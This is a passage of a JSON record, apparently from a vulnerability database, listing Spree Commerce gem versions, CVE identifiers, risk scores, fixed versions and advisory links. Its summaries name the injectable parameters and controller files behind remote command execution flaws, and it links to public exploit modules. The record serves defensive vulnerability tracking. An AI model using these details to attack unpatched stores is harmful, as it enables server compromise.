"https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2013-2506", "reference_id": "CVE-2013-2506", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-2506" }, { "reference_url": "https://github.com/advisories/GHSA-jp57-9j37-5476", "reference_id": "GHSA-jp57-9j37-5476", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jp57-9j37-5476" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/158197?format=api", "purl": "pkg:gem/spree@1.2.0.rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0.rc1" }, { "url": "http://public2.vulnerablecode.io/api/packages/158199?format=api", "purl": "pkg:gem/spree@1.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0" }, { "url": 
"http://public2.vulnerablecode.io/api/packages/158205?format=api", "purl": "pkg:gem/spree@1.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/51427?format=api", "purl": "pkg:gem/spree@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.5" } ], "aliases": [ "CVE-2013-2506", "GHSA-jp57-9j37-5476", "OSV-90865" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t9gu-2vs3-g7cu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37504?format=api", "vulnerability_id": "VCID-y37s-b27m-n7ad", "summary": "Authenticated administrators to execute arbitrary commands\nSpree Commerce allow remote authenticated administrators to instantiate arbitrary Ruby objects and execute arbitrary commands via the (1) payment_method parameter to core/app/controllers/spree/admin/payment_methods_controller.rb; and the (2) promotion_action parameter to promotion_actions_controller.rb, (3) promotion_rule parameter to promotion_rules_controller.rb, and (4) calculator_type parameter to promotions_controller.rb in promo/app/controllers/spree/admin/, related to unsafe use of the constantize function.", "references": [ { "reference_url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656", "reference_id": "", "reference_type": "", "scores": [], "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656" }, { "reference_url": 
"https://api.first.org/data/v1/epss?cve=CVE-2013-1656", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.541", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54074", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54097", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54043", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54108", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2013-1656" }, { "reference_url": "https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656" }, { "reference_url": "https://github.com/advisories/GHSA-jxx8-v83v-rhw3", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jxx8-v83v-rhw3" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1656", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1656" }, { "reference_url": "https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt" }, { "reference_url": "https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": "https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/51421?format=api", "purl": "pkg:gem/spree@1.3.3", "is_vulnerable": true, 
"affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/120517?format=api", "purl": "pkg:gem/spree@2.0.0.rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0.rc1" }, { "url": "http://public2.vulnerablecode.io/api/packages/51422?format=api", "purl": "pkg:gem/spree@2.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0" } ], "aliases": [ "CVE-2013-1656", "GHSA-jxx8-v83v-rhw3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y37s-b27m-n7ad" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/51436?format=api", "vulnerability_id": "VCID-w5fg-qcqv-uugu", "summary": "Spree Commerce is vulnerable to RCE through Search API\nSpreecommerce versions prior to 0.50.x contain a remote command\nexecution vulnerability in the API's search functionality. Improper\ninput sanitation allows attackers to inject arbitrary shell commands\nvia the search[instance_eval] parameter, which is dynamically invoked\nusing Ruby’s send method. 
This flaw enables unauthenticated attackers\nto execute commands on the server.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10026", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.68643", "scoring_system": "epss", "scoring_elements": "0.98637", "published_at": "2026-06-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10026" }, { "reference_url": "https://github.com/advisories/GHSA-x485-rhg3-cqr4", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x485-rhg3-cqr4" }, { "reference_url": "https://github.com/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://github.com/spree" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } 
], "url": "https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4" }, { "reference_url": "https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978" }, { "reference_url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb" }, { "reference_url": "https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes" }, { "reference_url": "https://www.exploit-db.com/exploits/17199", "reference_id": "", "reference_type": "", 
"scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://www.exploit-db.com/exploits/17199" }, { "reference_url": "https://www.vulncheck.com/advisories/spreecommerce-api-rce", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://www.vulncheck.com/advisories/spreecommerce-api-rce" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10026", "reference_id": "CVE-2011-10026", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10026" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml", "reference_id": "CVE-2011-10026.YML", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml" }, { "reference_url": 
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml", "reference_id": "CVE-2011-10026.YML", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/86146?format=api", "purl": "pkg:gem/spree@0.50.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-7jum-4ny7-xuhy" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0" } ], "aliases": [ "CVE-2011-10026", "GHSA-x485-rhg3-cqr4" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w5fg-qcqv-uugu" } ], "risk_score": "10.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0" }